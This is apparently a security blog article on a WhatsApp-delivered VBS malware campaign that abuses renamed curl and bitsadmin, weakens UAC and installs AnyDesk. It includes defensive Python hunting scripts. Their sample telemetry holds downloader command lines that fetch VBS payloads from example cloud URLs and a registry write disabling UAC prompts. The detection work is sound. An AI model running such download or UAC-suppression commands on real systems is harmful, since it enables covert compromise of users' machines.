WhatsApp VBS Malware: How Attackers Hijack Windows with a UAC Bypass (and What to Do Next)
WhatsApp VBS malware is the latest Windows threat Microsoft is warning about in 2026, and it is a nasty one. Attackers use WhatsApp messages to deliver malicious VBS files, then try to bypass UAC, hide inside normal-looking Windows activity, and take control of the system. If you use Windows at work or at home, this is the kind of attack you need to understand fast.
What makes this campaign stand out is not just the WhatsApp lure. It is the full chain. The attacker relies on social engineering, renamed Microsoft and Windows utilities, downloads from trusted cloud services, registry changes, and unsigned MSI installers to build long-term access. That mix makes the attack harder to spot than a simple attachment scam.
Why this WhatsApp malware matters in 2026
Microsoft says the campaign started in late February 2026. The delivery method is simple on the surface: a victim receives a malicious Visual Basic Script file through WhatsApp and runs it. From there, the malware kicks off a multi-stage infection chain focused on three goals:
- persistence
- remote access
- privilege escalation
That means the attack is not just trying to run once and disappear. It is trying to stay on your Windows device, raise its privileges, and give the attackers a way back in later.
One thing Microsoft noted is especially interesting: the exact social engineering lure is still unclear. In plain English, defenders know the delivery path, but they do not yet know the specific message themes being used to convince people to click and run the file.
How attackers use WhatsApp to start the attack
The first stage depends on one basic thing: getting you to execute a VBS file.
That matters because a .vbs file opened from Explorer is handed to wscript.exe (or to cscript.exe from a console), and the script then runs with the full rights of the logged-in user: it can write to disk, launch other programs, and reach the internet. Once the file is opened, the malware starts preparing the system for follow-on payloads.
According to Microsoft, the script does a few important things right away:
- creates hidden folders in C:\ProgramData
- drops renamed legitimate Windows utilities
- uses those tools to pull more payloads from the internet
The renamed tools are a big part of the trick. Microsoft observed:
- curl.exe renamed as netapi.dll
- bitsadmin.exe renamed as sc.exe
That is clever because these are legitimate utilities, just dressed up with misleading names. To a busy admin or an untrained user, the activity may not look obviously malicious at first glance.
The stealth trick: renamed Windows tools and hidden folders
This is where the campaign starts to feel more serious.
Instead of dropping a loud, obvious malware binary, the attackers use living-off-the-land techniques. They lean on tools that already exist in Windows or look like they belong there. They also place files in hidden folders under C:\ProgramData, which is a location many users never inspect.
Microsoft also highlighted a useful detection clue. Even when the attacker renames utilities on disk, the binaries keep their PE version resource, so a file with an innocent or misleading name can still carry an OriginalFileName value showing it is really curl.exe or bitsadmin.exe. Sysmon and most EDR products record that field on process creation, which makes it cheap to hunt.
That mismatch is worth hunting for.
For example, if your telemetry shows a file named netapi.dll acting like a downloader and its original metadata points to curl.exe, that is not normal. It is a strong signal that something is off. The reverse does not hold: an attacker can strip or forge the version resource, so a missing or matching OriginalFileName is not proof that a file is what it claims to be.
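As an added example (not code from Microsoft or from the campaign write-up), the following Python script runs that mismatch check over a handful of constructed Sysmon-style process-creation records. It flags a process whose OriginalFileName says curl.exe or bitsadmin.exe while its on-disk name differs, adds weight when the command line carries downloader flags, points at one of the cloud services discussed below, runs from C:\ProgramData, or was spawned by a script host, and it also catches the stripped-resource case where a file named .dll is launched as a process. The hidden folder name (.cache), the bucket names, and the cloud host suffixes (amazonaws.com, myqcloud.com, backblazeb2.com) are assumptions made for the example, not indicators from the report.

```python
"""Hunt for renamed Windows utilities in Sysmon-style process-creation telemetry.

Added example for this article; it is not code from Microsoft or from the
campaign write-up. The records below are constructed to mirror the behaviour
the article describes, using Sysmon Event ID 1 field names (Image,
OriginalFileName, CommandLine, ParentImage). The hidden folder name, bucket
names and cloud host suffixes are assumptions made for the example.
"""
import re
from urllib.parse import urlparse

# Utilities Microsoft saw renamed in this campaign. OriginalFileName comes from
# the PE version resource, so it survives a rename on disk unless stripped.
LOLBIN_ORIGINAL_NAMES = {"curl.exe", "bitsadmin.exe"}

# Command-line shapes that mean "download something" for each utility.
DOWNLOADER_PATTERNS = {
    "curl.exe": re.compile(r"(^|\s)(-o|--output|--remote-name)(\s|$)", re.I),
    "bitsadmin.exe": re.compile(r"/transfer", re.I),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Assumed host suffixes for the storage services named in the article
# (AWS S3, Tencent Cloud COS, Backblaze B2).
CLOUD_HOST_SUFFIXES = ("amazonaws.com", "myqcloud.com", "backblazeb2.com")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def basename(path):
    """Lower-cased final path component, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def on_watched_cloud(host):
    """True only for the suffix itself or a subdomain of it (not 'evilamazonaws.com')."""
    return any(host == s or host.endswith("." + s) for s in CLOUD_HOST_SUFFIXES)


def cloud_hosts(cmdline):
    """Hosts in the command line that belong to one of the watched cloud services."""
    hosts = []
    for url in URL_RE.findall(cmdline):
        host = (urlparse(url).hostname or "").lower()
        if on_watched_cloud(host):
            hosts.append(host)
    return hosts


def analyse(event):
    """Return the list of reasons this event matches the renamed-downloader tradecraft."""
    reasons = []
    on_disk = basename(event["Image"])
    original = (event.get("OriginalFileName") or "").lower()
    cmdline = event.get("CommandLine", "")

    if original in LOLBIN_ORIGINAL_NAMES and on_disk != original:
        reasons.append(f"renamed {original} running as {on_disk}")
        if DOWNLOADER_PATTERNS[original].search(cmdline):
            reasons.append("downloader-style flags")
    elif not original and on_disk.endswith(".dll"):
        # Version resource stripped, but a .dll should never be a process image.
        reasons.append("process image named .dll with no OriginalFileName")

    for host in cloud_hosts(cmdline):
        reasons.append(f"fetches from {host}")
    if "\\programdata\\" in event["Image"].lower():
        reasons.append("runs from C:\\ProgramData")
    if basename(event.get("ParentImage", "")) in SCRIPT_HOSTS:
        reasons.append("spawned by a script host")
    return reasons


def hunt(events):
    """Return [(Image, reasons)] for every event that produced at least one reason."""
    hits = []
    for event in events:
        reasons = analyse(event)
        if reasons:
            hits.append((event["Image"], reasons))
    return hits


# Constructed telemetry: two renamed downloaders from the chain, two benign launches.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\.cache\netapi.dll", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.cache\auxs.vbs "
                    r"https://bucket-example.s3.amazonaws.com/auxs.vbs"},
    {"Image": r"C:\ProgramData\.cache\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"sc.exe /transfer job /download "
                    r"https://f000.backblazeb2.com/file/example/WinUpdate_KB5034231.vbs "
                    r"C:\ProgramData\.cache\WinUpdate_KB5034231.vbs"},
    {"Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "sc.exe query wuauserv"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -o report.csv https://intranet.example.net/report"},
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("  -", reason)
```

Run as-is to see the two renamed downloaders flagged and the two genuine sc.exe and curl.exe launches ignored; in practice you would feed `hunt()` from a Sysmon or EDR export instead of SAMPLE_EVENTS. The real sc.exe in System32 passes because its OriginalFileName matches its name, which is exactly why the mismatch, not the name, is the signal.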
How payloads are downloaded from trusted cloud services
After the initial foothold, the malware downloads extra VBS payloads from trusted cloud services. Microsoft specifically named:
- AWS S3
- Tencent Cloud
- Backblaze B2
This part matters because defenders often allow traffic to major cloud providers. In many environments, outbound connections to these platforms are common. That gives attackers cover.
Microsoft described secondary payloads such as:
- auxs.vbs
- WinUpdate_KB5034231.vbs
On paper, those names can look routine enough to slip past a quick review. In practice, they are part of the attack chain.
This is one of those details I always come back to: trusted platforms are not automatically safe content sources. If your team treats all cloud traffic as harmless, you give attackers room to work.
How attackers bypass UAC and hijack Windows
Now we get to the part most people care about: how the attackers get around UAC to gain elevated control over Windows.
Microsoft says the malware tampers with User Account Control settings and repeatedly attempts to launch cmd.exe with elevated privileges. It keeps retrying until the UAC elevation succeeds or the process is stopped.
That repeated behavior is important. This is not a single casual attempt. It is an active effort to weaken defenses and take administrative control.
The malware also modifies registry entries under:
HKLM\Software\Microsoft\Win
Microsoft further noted that the campaign modifies ConsentPromptBehaviorAdmin to suppress UAC prompts. That value controls what an administrator sees when a program requests elevation: the Windows default, 5, prompts for consent for non-Windows binaries, while 0 elevates silently. In practical terms, setting it to 0 lets the attacker gain elevated privileges without normal user interaction. One caveat worth keeping in mind: policy keys under HKLM can only be written with administrative rights, so the value change most plausibly lands after the retry loop has produced one successful elevation, and its job from then on is to keep every later elevation quiet.
If you are wondering why this matters so much, here is the simple answer: once an attacker gets elevated rights, cleanup gets harder. They can change more settings, install more tools, survive reboots, and make your Windows machine feel normal while it is no longer fully yours.
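As an added example (not Microsoft's code or anything taken from the report), here is a Python triage script over constructed Sysmon-style records that covers both halves of this stage: the retry loop, modelled as repeated consent.exe launches (one per UAC prompt) followed by a High-integrity cmd.exe whose parent is wscript.exe, and the registry write that sets ConsentPromptBehaviorAdmin to 0. It goes slightly beyond the article by also watching EnableLUA and PromptOnSecureDesktop in the same key, since a 0 in any of them weakens UAC. The key path is the documented home of ConsentPromptBehaviorAdmin, used because the path quoted above is truncated; the timestamps, process paths, and the assumption that each prompt surfaces as a consent.exe process creation are constructed for the example.

```python
"""Spot UAC tampering and elevation prompt-bombing in constructed Sysmon-style telemetry.

Added example for this article; it is not code from Microsoft or from the
report it summarises. Registry records follow Sysmon Event ID 13 (SetValue),
process records Sysmon Event ID 1. The key path is the documented location of
ConsentPromptBehaviorAdmin, used because the article's own path is truncated.
Timestamps, process paths and the modelling of each UAC prompt as a
consent.exe launch are assumptions made for the example.
"""
import re
from datetime import datetime, timedelta

UAC_POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# UAC values under that key where a DWORD of 0 weakens or disables UAC.
# ConsentPromptBehaviorAdmin defaults to 5 (prompt for consent for non-Windows
# binaries); 0 means elevate without prompting.
WEAK_WHEN_ZERO = {
    "ConsentPromptBehaviorAdmin": "elevate without prompting",
    "EnableLUA": "UAC disabled entirely",
    "PromptOnSecureDesktop": "prompts no longer shown on the secure desktop",
}
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")  # Sysmon Details format
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_time(utc):
    """Sysmon UtcTime, e.g. '2026-03-01 10:15:02.123'."""
    return datetime.strptime(utc, "%Y-%m-%d %H:%M:%S.%f")


def registry_alerts(reg_events):
    """Alerts for watched UAC policy values written as 0."""
    alerts = []
    for ev in reg_events:
        if ev.get("EventType") != "SetValue":
            continue
        key, _, name = ev["TargetObject"].rpartition("\\")
        if key.lower() != UAC_POLICY_KEY.lower() or name not in WEAK_WHEN_ZERO:
            continue
        match = DWORD_RE.fullmatch(ev["Details"].strip())
        if match and int(match.group(1), 16) == 0:
            alerts.append(f"{name} set to 0 ({WEAK_WHEN_ZERO[name]}) by {basename(ev['Image'])}")
    return alerts


def max_prompt_burst(proc_events, window_seconds=120):
    """Most UAC prompts (consent.exe launches) seen inside any sliding window.

    A declined elevation leaves no elevated cmd.exe behind, so the retry loop
    is visible mainly as a run of prompts in a short period.
    """
    window = timedelta(seconds=window_seconds)
    times = sorted(parse_time(ev["UtcTime"]) for ev in proc_events
                   if basename(ev["Image"]) == "consent.exe")
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def script_host_elevations(proc_events):
    """cmd.exe at High integrity with a script host as parent: the loop succeeded."""
    return [ev for ev in proc_events
            if basename(ev["Image"]) == "cmd.exe"
            and ev.get("IntegrityLevel") == "High"
            and basename(ev.get("ParentImage", "")) in SCRIPT_HOSTS]


def triage(proc_events, reg_events):
    return {
        "uac_prompts_in_2min": max_prompt_burst(proc_events),
        "elevated_cmd_from_script_host": len(script_host_elevations(proc_events)),
        "registry_alerts": registry_alerts(reg_events),
    }


def _consent(utc):  # one constructed UAC prompt
    return {"UtcTime": utc, "Image": r"C:\Windows\System32\consent.exe",
            "ParentImage": r"C:\Windows\System32\svchost.exe", "IntegrityLevel": "System"}

# Constructed telemetry: four prompts in under two minutes, then an elevated
# cmd.exe under wscript.exe, alongside one ordinary cmd.exe from Explorer.
PROC_EVENTS = [
    _consent("2026-03-01 10:15:02.110"), _consent("2026-03-01 10:15:30.402"),
    _consent("2026-03-01 10:16:05.077"), _consent("2026-03-01 10:16:40.915"),
    {"UtcTime": "2026-03-01 10:16:45.300", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "IntegrityLevel": "High"},
    {"UtcTime": "2026-03-01 10:20:00.000", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
]
REG_EVENTS = [
    {"EventType": "SetValue", "UtcTime": "2026-03-01 10:16:50.001",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": UAC_POLICY_KEY + r"\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventType": "SetValue", "UtcTime": "2026-03-01 09:00:00.000",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": UAC_POLICY_KEY + r"\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000005)"},
]

if __name__ == "__main__":
    print(triage(PROC_EVENTS, REG_EVENTS))
```

The burst threshold is a tuning knob: four prompts in two minutes is far outside what a normal desktop produces, while a single prompt followed by a legitimate elevation is everyday noise. The write that restores the default value of 5 is deliberately not alerted on, so the rule does not fire when an admin or Group Policy puts the setting back.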
Persistence after reboot: what the malware does next
The campaign does not stop after privilege escalation. It embeds persistence mechanisms so the infection survives system reboots.
That means restarting the PC will not solve the problem.
This is where many users get caught. They notice a weird process, reboot, and assume the issue is gone. But Microsoft says the malware is built to maintain long-term access.
The final stage includes malicious, unsigned MSI packages, including:
- Setup.msi
- WinRAR.msi
- LinkPoint.msi
- AnyDesk.msi
The unsigned part is key. Legitimate installers from established vendors normally carry a valid Authenticode signature, which you can check from the file's Properties > Digital Signatures tab or with Get-AuthenticodeSignature in PowerShell. Unsigned MSI files in a chain like this deserve immediate attention.
Why AnyDesk appears in the final stage
Microsoft said the campaign includes remote access software, specifically AnyDesk, to provide persistent remote access.
That opens the door to:
- data exfiltration
- hands-on keyboard activity by the attacker
- additional malware deployment
- long-term surveillance of the infected system
A lot of people think of remote access tools as safe by default because IT teams use them every day. But in the wrong hands, they become an easy backdoor.
So if you see an unexpected AnyDesk install after suspicious script activity, treat it as a major incident, not a small software oddity.
Indicators security teams should watch for
If you defend Windows endpoints, here are some of the strongest behavior-based signals from Microsoft's findings:
- WhatsApp-delivered .vbs files being executed
- wscript.exe or cscript.exe launching suspicious VBS scripts
- hidden folders created under C:\ProgramData
- renamed legitimate utilities such as curl.exe and bitsadmin.exe
- PE metadata mismatches between file name and OriginalFileName
- downloader-style command-line flags on renamed utilities
- outbound traffic to AWS S3, Tencent Cloud, or Backblaze B2 tied to suspicious script execution
- repeated attempts to elevate cmd.exe
- registry changes under HKLM\Software\Microsoft\Win
- changes to ConsentPromptBehaviorAdmin
- unsigned MSI installers dropped and executed
- unexpected installation of AnyDesk
- traffic to known domains like Neescil[.]top and velthora[.]top
What to do next if you suspect infection
If you think one of your systems was hit, move fast.
1. Isolate the Windows device
Disconnect it from the network right away. If the attacker has remote access, every extra minute matters.
2. Preserve evidence
Do not start deleting files at random. Save logs, running process data, registry snapshots, and network telemetry if you can. Your security team may need that data to understand the full chain.
3. Hunt for the early signs
Check for:
- VBS files launched from user-download or messaging-related paths
- hidden directories in C:\ProgramData
- renamed versions of curl.exe and bitsadmin.exe
- suspicious MSI files
- AnyDesk installations the user did not request
4. Review UAC-related registry settings
Pay close attention to changes under HKLM\Software\Microsoft\Win and settings tied to ConsentPromptBehaviorAdmin.
5. Block known infrastructure
If your controls allow it, block direct access to known malicious domains and any identified URLs from threat intelligence tied to this campaign.
6. Reset credentials and review access
If the attacker gained elevated rights, assume credentials may be exposed. Reset impacted credentials and review admin activity carefully.
7. Rebuild if needed
If persistence is confirmed, a clean rebuild may be the safest path. In many cases, that is faster and more reliable than trying to trust a heavily tampered Windows install.
How to protect your organization from WhatsApp malware
Microsoft's guidance points to a few practical defenses that can reduce risk.
Restrict script hosts
Block or tightly control the Windows script hosts, especially when they run from untrusted paths:
- wscript.exe
- cscript.exe
- mshta.exe
Monitor for renamed Windows utilities
Look for binaries whose on-disk names do not match their original metadata. This is one of the sharper detection angles in this campaign.
Watch cloud traffic more closely
Do not assume AWS, Tencent Cloud, or Backblaze B2 traffic is always benign. Add inspection and alerting for suspicious downloads tied to script execution.
Detect persistence and UAC tampering
Alert on repeated UAC-related registry changes and privilege escalation attempts. Repeated elevation tries should stand out in a healthy environment.
Turn on Microsoft Defender protections
Microsoft recommends enabling protections such as:
- cloud-delivered protection in Microsoft Defender Antivirus
- Edge and SmartScreen protections
- EDR in block mode for Defender for Endpoint
- network protection and web protection
- tamper protection
- attack surface reduction rules to block obfuscated scripts
- rules to block VBScript or JavaScript from launching downloaded executable content
Train users on WhatsApp social engineering
People often treat messaging apps as casual and safe. That is exactly why this delivery method works. Teach users to treat WhatsApp attachments and file requests like email attachments from strangers.
A quick plain-English summary of the attack chain
If you want the short version, here it is:
- The attacker sends a malicious VBS file through WhatsApp.
- The victim runs it on Windows.
- The script creates hidden folders and drops renamed legitimate tools.
- Those tools download more payloads from trusted cloud services.
- The malware tampers with UAC and tries to elevate privileges.
- It changes registry settings and adds persistence.
- It deploys unsigned MSI installers.
- It enables remote access, including through AnyDesk.
That is why this is more than just a phishing message. It is a full takeover chain.
FAQ
What is WhatsApp VBS malware?
WhatsApp VBS malware is a Windows-focused attack campaign in which attackers send malicious Visual Basic Script files through WhatsApp messages. When the victim runs the script, it starts a multi-stage infection chain that can lead to persistence, remote access, and privilege escalation.
How do attackers bypass UAC in this campaign?
Microsoft says the malware tampers with UAC settings, repeatedly tries to launch cmd.exe with elevated privileges, and modifies registry values including ConsentPromptBehaviorAdmin. The goal is to suppress prompts and gain elevated access without normal user interaction.
Why do trusted cloud services matter in this attack?
The attackers host payloads on AWS S3, Tencent Cloud, and Backblaze B2. Because many organizations trust or allow traffic to these platforms, malicious downloads can blend in with ordinary network activity.
What Windows artifacts should I check first?
Start with hidden folders in C:\ProgramData, suspicious VBS execution through wscript.exe or cscript.exe, renamed utilities like netapi.dll and sc.exe, registry changes under HKLM\Software\Microsoft\Win, unsigned MSI files, and unexpected AnyDesk installations.
Is AnyDesk malware?
No. AnyDesk itself is legitimate remote access software. In this campaign, attackers abuse it as a persistence and remote-control tool. The problem is the unauthorized installation and use, not the brand alone.
What should I do if a user opened the VBS file?
Isolate the system, preserve logs and evidence, investigate for persistence and UAC changes, review outbound cloud traffic, remove unauthorized remote access tools, reset affected credentials, and consider a full rebuild if administrative compromise is confirmed.
Final thoughts
The big lesson from this 2026 campaign is simple: attackers do not always need exotic malware to hijack Windows. Sometimes they just need a message on WhatsApp, a VBS file, a few renamed utilities, and a path around UAC.
Microsoft's warning is a good reminder that legitimate tools and trusted platforms can still be part of a dangerous attack. If you tighten script controls, monitor cloud downloads, and treat messaging-based file delivery seriously, you give yourself a much better chance of stopping this kind of WhatsApp malware before it turns into a full system takeover.

